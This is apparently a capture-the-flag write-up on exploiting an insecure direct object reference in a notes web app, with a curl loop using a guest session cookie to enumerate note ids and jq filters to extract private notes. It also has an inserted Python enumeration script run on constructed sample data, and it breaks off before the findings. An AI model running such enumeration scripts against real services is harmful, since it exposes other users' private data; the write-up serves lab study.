The Gate of Broken Names

Personal Rating: Easy

In this challenge we are presented with a web page that we can access as a guest user. It lets us write and read chronicles and manage our user and "realm". Browsing through the pages and inspecting the URLs quickly raises the suspicion of an IDOR on the page where chronicles are read: a note is selected purely by a numeric id, with nothing tying that id to the logged-in user. And indeed, setting the id to different values lets you read all notes, including private ones:

I also tried some simple injections on the id parameter (which did not yield anything of interest) before writing a script that retrieves all notes via the IDOR:

# Walk ids 1..300 on the notes API with the guest session cookie.
# The browser-fingerprint headers Burp exported have been dropped; in particular
# sending "Accept-Encoding: gzip, deflate, br" without --compressed can leave
# compressed bytes in the output file. Responses are appended back to back.
for i in {1..300}; do
    curl -s -k \
        -b 'connect.sid=s%3ABq7vAWAGx5iQAu2xkDE_VHgmMdOJuPNI.oxlpWzywa7ASuMHTZ8RU6%2BrQj952DZ3so%2B3pHhBM2aQ' \
        "http://46.101.199.40:30887/api/notes/$i"
done >> results.txt

I surrounded the entire text with square brackets and added a comma after each entry to convert it to valid JSON. Then I filtered for all private notes:

# Pretty-print the hand-fixed array, then keep only entries flagged private
jq . results.txt >> notesclean.json
jq '.[] | select(.is_private == 1)' notesclean.json > privatenotes.json
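The same enumerate-then-filter procedure, in Python instead of a curl loop plus manual JSON fix-up, as an added example that is not the writeup's own script. It stops after a run of consecutive misses rather than at a hard-coded 300, skips non-JSON bodies (HTML error pages), and emits a valid JSON array of private notes directly. The target URL, the session cookie, the note fields other than `is_private`, and the sample responses are assumptions or constructed for this example; only `is_private` is taken from the writeup's jq filter.

```python
"""Enumerate /api/notes/<id> through the IDOR and keep only private notes.

Added example, not the challenge author's script. Assumes the API returns
one JSON object per note carrying an `is_private` field; BASE_URL, the
cookie and SAMPLE_RESPONSES are placeholders / constructed data.
"""
import json
from typing import Callable, Dict, List, Optional

BASE_URL = "http://TARGET:PORT"            # assumption: replace with the real host
SESSION_COOKIE = "connect.sid=REPLACE_ME"  # assumption: the guest session cookie


def fetch_note_http(note_id: int) -> Optional[str]:
    """Fetch one note with the guest session; None on any HTTP error (404 etc.)."""
    import urllib.error
    import urllib.request
    req = urllib.request.Request(
        f"{BASE_URL}/api/notes/{note_id}",
        headers={"Cookie": SESSION_COOKIE, "Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError:
        return None


def parse_note(body: Optional[str]) -> Optional[Dict]:
    """Decode one response body; drop empty, non-JSON or non-object bodies."""
    if not body:
        return None
    try:
        obj = json.loads(body)
    except json.JSONDecodeError:
        return None
    return obj if isinstance(obj, dict) else None


def enumerate_notes(fetch: Callable[[int], Optional[str]],
                    start: int = 1, max_id: int = 300,
                    stop_after_misses: int = 20) -> List[Dict]:
    """Walk ids upward; stop early after `stop_after_misses` consecutive misses."""
    notes: List[Dict] = []
    misses = 0
    for note_id in range(start, max_id + 1):
        note = parse_note(fetch(note_id))
        if note is None:
            misses += 1
            if misses >= stop_after_misses:
                break
            continue
        misses = 0
        note.setdefault("id", note_id)  # remember which id leaked this note
        notes.append(note)
    return notes


def private_notes(notes: List[Dict]) -> List[Dict]:
    """Same as jq '.[] | select(.is_private == 1)', also accepting true/"1"."""
    return [n for n in notes
            if str(n.get("is_private", 0)).lower() in ("1", "true")]


# Constructed sample responses standing in for the real server (offline run).
SAMPLE_RESPONSES = {
    1: '{"id": 1, "title": "Welcome", "content": "public chronicle", "is_private": 0}',
    2: '{"id": 2, "title": "Secret", "content": "private chronicle", "is_private": 1}',
    3: None,                       # deleted note -> 404
    4: '{"id": 4, "title": "Realm", "content": "also private", "is_private": true}',
    5: "<html>Not Found</html>",   # HTML error page, not JSON
}


def fetch_note_sample(note_id: int) -> Optional[str]:
    return SAMPLE_RESPONSES.get(note_id)


if __name__ == "__main__":
    # Swap fetch_note_sample for fetch_note_http to run against the target.
    found = enumerate_notes(fetch_note_sample, max_id=40, stop_after_misses=10)
    print(json.dumps(private_notes(found), indent=2))
```

The fetcher is injected so the same enumeration logic can be exercised against the constructed responses first and pointed at the real host afterwards by passing `fetch_note_http`.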

I read through the notes, and this is what I found:
